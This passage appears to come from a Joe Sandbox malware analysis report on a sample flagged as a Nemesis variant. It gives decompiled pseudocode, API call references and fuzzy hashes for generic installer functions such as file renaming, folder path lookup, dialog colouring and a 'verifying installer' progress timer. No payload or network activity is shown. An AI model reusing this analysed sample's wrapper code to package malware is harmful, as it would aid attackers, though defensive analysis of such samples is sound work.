                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                  • GetShortPathNameW.KERNEL32 ref: 004061E4
                                  • wsprintfA.USER32 ref: 00406202
                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                  • GlobalFree.KERNEL32 ref: 004062EB
                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$[Rename]
                                  • API String ID: 2171350718-461813615
                                  • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                  • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                  • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                  • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                  				struct _ITEMIDLIST* _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _t44;
                                  				WCHAR* _t45;
                                  				signed char _t47;
                                  				signed int _t48;
                                  				short _t59;
                                  				short _t61;
                                  				short _t63;
                                  				void* _t71;
                                  				signed int _t77;
                                  				signed int _t78;
                                  				short _t81;
                                  				short _t82;
                                  				signed char _t84;
                                  				signed int _t85;
                                  				intOrPtr _t93;
                                  				void* _t98;
                                  				void* _t104;
                                  				intOrPtr* _t105;
                                  				void* _t107;
                                  				WCHAR* _t108;
                                  				void* _t110;
                                  
                                  				_t107 = __esi;
                                  				_t104 = __edi;
                                  				_t71 = __ebx;
                                  				_t44 = _a8;
                                  				if(_t44 < 0) {
                                  					_t93 =  *0x433edc; // 0x81267e
                                  					_t44 =  *(_t93 - 4 + _t44 * 4);
                                  				}
                                  				_push(_t71);
                                  				_push(_t107);
                                  				_push(_t104);
                                  				_t105 =  *0x434f38 + _t44 * 2;
                                  				_t45 = 0x432ea0;
                                  				_t108 = 0x432ea0;
                                  				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                  					_t108 = _a4;
                                  					_a4 = _a4 & 0x00000000;
                                  				}
                                  				_t81 =  *_t105;
                                  				_a8 = _t81;
                                  				if(_t81 == 0) {
                                  					L43:
                                  					 *_t108 =  *_t108 & 0x00000000;
                                  					if(_a4 == 0) {
                                  						return _t45;
                                  					}
                                  					return E0040653D(_a4, _t45);
                                  				} else {
                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                  						_t98 = 2;
                                  						_t105 = _t105 + _t98;
                                  						if(_t81 >= 4) {
                                  							if(__eflags != 0) {
                                  								 *_t108 = _t81;
                                  								_t108 = _t108 + _t98;
                                  								__eflags = _t108;
                                  							} else {
                                  								 *_t108 =  *_t105;
                                  								_t108 = _t108 + _t98;
                                  								_t105 = _t105 + _t98;
                                  							}
                                  							L42:
                                  							_t82 =  *_t105;
                                  							_a8 = _t82;
                                  							if(_t82 != 0) {
                                  								_t81 = _a8;
                                  								continue;
                                  							}
                                  							goto L43;
                                  						}
                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                  						_t47 =  *_t105;
                                  						_t48 = _t47 & 0x000000ff;
                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                  						_t85 = _t84 & 0x000000ff;
                                  						_v28 = _t48 | 0x00008000;
                                  						_t77 = 2;
                                  						_v16 = _t85;
                                  						_t105 = _t105 + _t77;
                                  						_v24 = _t48;
                                  						_v20 = _t85 | 0x00008000;
                                  						if(_a8 != _t77) {
                                  							__eflags = _a8 - 3;
                                  							if(_a8 != 3) {
                                  								__eflags = _a8 - 1;
                                  								if(__eflags == 0) {
                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                  									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                  								}
                                  								L38:
                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                  								_t45 = 0x432ea0;
                                  								goto L42;
                                  							}
                                  							_t78 = _v12;
                                  							__eflags = _t78 - 0x1d;
                                  							if(_t78 != 0x1d) {
                                  								__eflags = (_t78 << 0xb) + 0x436000;
                                  								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                  							} else {
                                  								E00406484(_t108,  *0x434f08);
                                  							}
                                  							__eflags = _t78 + 0xffffffeb - 7;
                                  							if(__eflags < 0) {
                                  								L29:
                                  								E004067C4(_t108);
                                  							}
                                  							goto L38;
                                  						}
                                  						if( *0x434f84 != 0) {
                                  							_t77 = 4;
                                  						}
                                  						_t121 = _t48;
                                  						if(_t48 >= 0) {
                                  							__eflags = _t48 - 0x25;
                                  							if(_t48 != 0x25) {
                                  								__eflags = _t48 - 0x24;
                                  								if(_t48 == 0x24) {
                                  									GetWindowsDirectoryW(_t108, 0x400);
                                  									_t77 = 0;
                                  								}
                                  								while(1) {
                                  									__eflags = _t77;
                                  									if(_t77 == 0) {
                                  										goto L26;
                                  									}
                                  									_t59 =  *0x434f04;
                                  									_t77 = _t77 - 1;
                                  									__eflags = _t59;
                                  									if(_t59 == 0) {
                                  										L22:
                                  										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                  										__eflags = _t61;
                                  										if(_t61 != 0) {
                                  											L24:
                                  											 *_t108 =  *_t108 & 0x00000000;
                                  											__eflags =  *_t108;
                                  											continue;
                                  										}
                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                  										_a8 = _t61;
                                  										__imp__CoTaskMemFree(_v8);
                                  										__eflags = _a8;
                                  										if(_a8 != 0) {
                                  											goto L26;
                                  										}
                                  										goto L24;
                                  									}
                                  									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                  									__eflags = _t63;
                                  									if(_t63 == 0) {
                                  										goto L26;
                                  									}
                                  									goto L22;
                                  								}
                                  								goto L26;
                                  							}
                                  							GetSystemDirectoryW(_t108, 0x400);
                                  							goto L26;
                                  						} else {
                                  							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                  							if( *_t108 != 0) {
                                  								L27:
                                  								if(_v16 == 0x1a) {
                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                  								}
                                  								goto L29;
                                  							}
                                  							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                  							L26:
                                  							if( *_t108 == 0) {
                                  								goto L29;
                                  							}
                                  							goto L27;
                                  						}
                                  					}
                                  					goto L43;
                                  				}
                                  			}






























                                  0x0040657a
                                  0x0040657a
                                  0x0040657a
                                  0x00406580
                                  0x00406585
                                  0x00406587
                                  0x00406596
                                  0x00406596
                                  0x0040659e
                                  0x0040659f
                                  0x004065a0
                                  0x004065a1
                                  0x004065a4
                                  0x004065ac
                                  0x004065ae
                                  0x004065bf
                                  0x004065c2
                                  0x004065c2
                                  0x004065c6
                                  0x004065cc
                                  0x004065cf
                                  0x004067aa
                                  0x004067aa
                                  0x004067b5
                                  0x004067c1
                                  0x004067c1
                                  0x00000000
                                  0x004065d5
                                  0x004065da
                                  0x004065ef
                                  0x004065f0
                                  0x004065f6
                                  0x00406788
                                  0x00406796
                                  0x00406799
                                  0x00406799
                                  0x0040678a
                                  0x0040678d
                                  0x00406790
                                  0x00406792
                                  0x00406792
                                  0x0040679b
                                  0x0040679b
                                  0x004067a1
                                  0x004067a4
                                  0x004065d7
                                  0x00000000
                                  0x004065d7
                                  0x00000000
                                  0x004067a4
                                  0x004065fc
                                  0x004065ff
                                  0x0040660e
                                  0x00406615
                                  0x00406621
                                  0x00406624
                                  0x00406627
                                  0x00406628
                                  0x0040662d
                                  0x00406633
                                  0x00406636
                                  0x00406639
                                  0x0040672c
                                  0x00406731
                                  0x00406764
                                  0x00406769
                                  0x0040676e
                                  0x00406773
                                  0x00406773
                                  0x00406778
                                  0x0040677e
                                  0x00406781
                                  0x00000000
                                  0x00406781
                                  0x00406733
                                  0x00406736
                                  0x00406739
                                  0x0040674e
                                  0x00406755
                                  0x0040673b
                                  0x00406742
                                  0x00406742
                                  0x0040675d
                                  0x00406760
                                  0x00406724
                                  0x00406725
                                  0x00406725
                                  0x00000000
                                  0x00406760
                                  0x00406646
                                  0x0040664a
                                  0x0040664a
                                  0x0040664b
                                  0x0040664d
                                  0x0040668a
                                  0x0040668d
                                  0x0040669d
                                  0x004066a0
                                  0x004066a8
                                  0x004066ae
                                  0x004066ae
                                  0x00406709
                                  0x00406709
                                  0x0040670b
                                  0x00000000
                                  0x00000000
                                  0x004066b2
                                  0x004066b7
                                  0x004066b8
                                  0x004066ba
                                  0x004066d1
                                  0x004066df
                                  0x004066e5
                                  0x004066e7
                                  0x00406705
                                  0x00406705
                                  0x00406705
                                  0x00000000
                                  0x00406705
                                  0x004066ed
                                  0x004066f6
                                  0x004066f9
                                  0x004066ff
                                  0x00406703
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406703
                                  0x004066cb
                                  0x004066cd
                                  0x004066cf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066cf
                                  0x00000000
                                  0x00406709
                                  0x00406695
                                  0x00000000
                                  0x0040664f
                                  0x0040666d
                                  0x00406676
                                  0x00406713
                                  0x00406717
                                  0x0040671f
                                  0x0040671f
                                  0x00000000
                                  0x00406717
                                  0x00406680
                                  0x0040670d
                                  0x00406711
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406711
                                  0x0040664d
                                  0x00000000
                                  0x004065da

                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,00000000,?,76CDEA30), ref: 004066A8
                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000), ref: 00406779
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 4260037668-2724444456
                                  • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                  • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                  • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                  • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                  				struct tagLOGBRUSH _v16;
                                  				long _t39;
                                  				long _t41;
                                  				void* _t44;
                                  				signed char _t50;
                                  				long* _t54;
                                  
                                  				if(_a4 + 0xfffffecd > 5) {
                                  					L18:
                                  					return 0;
                                  				}
                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                  					goto L18;
                                  				} else {
                                  					_t50 = _t54[5];
                                  					if((_t50 & 0xffffffe0) != 0) {
                                  						goto L18;
                                  					}
                                  					_t39 =  *_t54;
                                  					if((_t50 & 0x00000002) != 0) {
                                  						_t39 = GetSysColor(_t39);
                                  					}
                                  					if((_t54[5] & 0x00000001) != 0) {
                                  						SetTextColor(_a8, _t39);
                                  					}
                                  					SetBkMode(_a8, _t54[4]);
                                  					_t41 = _t54[1];
                                  					_v16.lbColor = _t41;
                                  					if((_t54[5] & 0x00000008) != 0) {
                                  						_t41 = GetSysColor(_t41);
                                  						_v16.lbColor = _t41;
                                  					}
                                  					if((_t54[5] & 0x00000004) != 0) {
                                  						SetBkColor(_a8, _t41);
                                  					}
                                  					if((_t54[5] & 0x00000010) != 0) {
                                  						_v16.lbStyle = _t54[2];
                                  						_t44 = _t54[3];
                                  						if(_t44 != 0) {
                                  							DeleteObject(_t44);
                                  						}
                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                  					}
                                  					return _t54[3];
                                  				}
                                  			}









                                  0x00404512
                                  0x004045c8
                                  0x00000000
                                  0x004045c8
                                  0x00404523
                                  0x00404527
                                  0x00000000
                                  0x00404541
                                  0x00404541
                                  0x0040454a
                                  0x00000000
                                  0x00000000
                                  0x0040454c
                                  0x00404558
                                  0x0040455b
                                  0x0040455b
                                  0x00404561
                                  0x00404567
                                  0x00404567
                                  0x00404573
                                  0x00404579
                                  0x00404580
                                  0x00404583
                                  0x00404586
                                  0x00404588
                                  0x00404588
                                  0x00404590
                                  0x00404596
                                  0x00404596
                                  0x004045a0
                                  0x004045a5
                                  0x004045a8
                                  0x004045ad
                                  0x004045b0
                                  0x004045b0
                                  0x004045c0
                                  0x004045c0
                                  0x00000000
                                  0x004045c3

                                  APIs
                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                  • GetSysColor.USER32(00000000), ref: 0040455B
                                  • SetTextColor.GDI32(?,00000000), ref: 00404567
                                  • SetBkMode.GDI32(?,?), ref: 00404573
                                  • GetSysColor.USER32(?), ref: 00404586
                                  • SetBkColor.GDI32(?,?), ref: 00404596
                                  • DeleteObject.GDI32(?), ref: 004045B0
                                  • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                  • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                  • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004067C4(WCHAR* _a4) {
                                  				short _t5;
                                  				short _t7;
                                  				WCHAR* _t19;
                                  				WCHAR* _t20;
                                  				WCHAR* _t21;
                                  
                                  				_t20 = _a4;
                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                  					_t20 =  &(_t20[4]);
                                  				}
                                  				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                  					_t20 =  &(_t20[2]);
                                  				}
                                  				_t5 =  *_t20;
                                  				_t21 = _t20;
                                  				_t19 = _t20;
                                  				if(_t5 != 0) {
                                  					do {
                                  						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                  							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                  							_t19 = CharNextW(_t19);
                                  						}
                                  						_t20 = CharNextW(_t20);
                                  						_t5 =  *_t20;
                                  					} while (_t5 != 0);
                                  				}
                                  				 *_t19 =  *_t19 & 0x00000000;
                                  				while(1) {
                                  					_push(_t19);
                                  					_push(_t21);
                                  					_t19 = CharPrevW();
                                  					_t7 =  *_t19;
                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                  						break;
                                  					}
                                  					 *_t19 =  *_t19 & 0x00000000;
                                  					if(_t21 < _t19) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				return _t7;
                                  			}








                                  0x004067c6
                                  0x004067cf
                                  0x004067e6
                                  0x004067e6
                                  0x004067ed
                                  0x004067f9
                                  0x004067f9
                                  0x004067fc
                                  0x004067ff
                                  0x00406804
                                  0x00406806
                                  0x0040680f
                                  0x00406813
                                  0x00406830
                                  0x00406838
                                  0x00406838
                                  0x0040683d
                                  0x0040683f
                                  0x00406842
                                  0x00406847
                                  0x00406848
                                  0x0040684c
                                  0x0040684c
                                  0x0040684d
                                  0x00406854
                                  0x00406856
                                  0x0040685d
                                  0x00000000
                                  0x00000000
                                  0x00406865
                                  0x0040686b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040686b
                                  0x00406870

                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                  • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                  • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                  • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-4010320282
                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                  • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                  • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                  				long _v8;
                                  				signed char _v12;
                                  				unsigned int _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				long _v56;
                                  				void* _v60;
                                  				long _t15;
                                  				unsigned int _t19;
                                  				signed int _t25;
                                  				struct HWND__* _t28;
                                  
                                  				_t28 = _a4;
                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                  				if(_a8 == 0) {
                                  					L4:
                                  					_v56 = _t15;
                                  					_v60 = 4;
                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                  					return _v24;
                                  				}
                                  				_t19 = GetMessagePos();
                                  				_v16 = _t19 >> 0x10;
                                  				_v20 = _t19;
                                  				ScreenToClient(_t28,  &_v20);
                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                  				if((_v12 & 0x00000066) != 0) {
                                  					_t15 = _v8;
                                  					goto L4;
                                  				}
                                  				return _t25 | 0xffffffff;
                                  			}














                                  0x00404e62
                                  0x00404e6f
                                  0x00404e75
                                  0x00404eb3
                                  0x00404eb3
                                  0x00404ec2
                                  0x00404ec9
                                  0x00000000
                                  0x00404ecb
                                  0x00404e77
                                  0x00404e86
                                  0x00404e8e
                                  0x00404e91
                                  0x00404ea3
                                  0x00404ea9
                                  0x00404eb0
                                  0x00000000
                                  0x00404eb0
                                  0x00000000

                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                  • GetMessagePos.USER32 ref: 00404E77
                                  • ScreenToClient.USER32 ref: 00404E91
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                  • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                  • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                  				short _v132;
                                  				int _t11;
                                  				int _t20;
                                  
                                  				if(_a8 == 0x110) {
                                  					SetTimer(_a4, 1, 0xfa, 0);
                                  					_a8 = 0x113;
                                  				}
                                  				if(_a8 == 0x113) {
                                  					_t20 =  *0x41ea18; // 0xf60c7
                                  					_t11 =  *0x42aa24; // 0xf60cb
                                  					if(_t20 >= _t11) {
                                  						_t20 = _t11;
                                  					}
                                  					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                  					SetWindowTextW(_a4,  &_v132);
                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                  				}
                                  				return 0;
                                  			}






                                  0x00402fa3
                                  0x00402fb1
                                  0x00402fb7
                                  0x00402fb7
                                  0x00402fc5
                                  0x00402fc7
                                  0x00402fcd
                                  0x00402fd4
                                  0x00402fd6
                                  0x00402fd6
                                  0x00402fec
                                  0x00402ffc
                                  0x0040300e
                                  0x0040300e
                                  0x00403016

                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                  • MulDiv.KERNEL32(000F60C7,00000064,000F60CB), ref: 00402FDC
                                  • wsprintfW.USER32 ref: 00402FEC
                                  • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                  • SetDlgItemTextW.USER32 ref: 0040300E
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402FE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
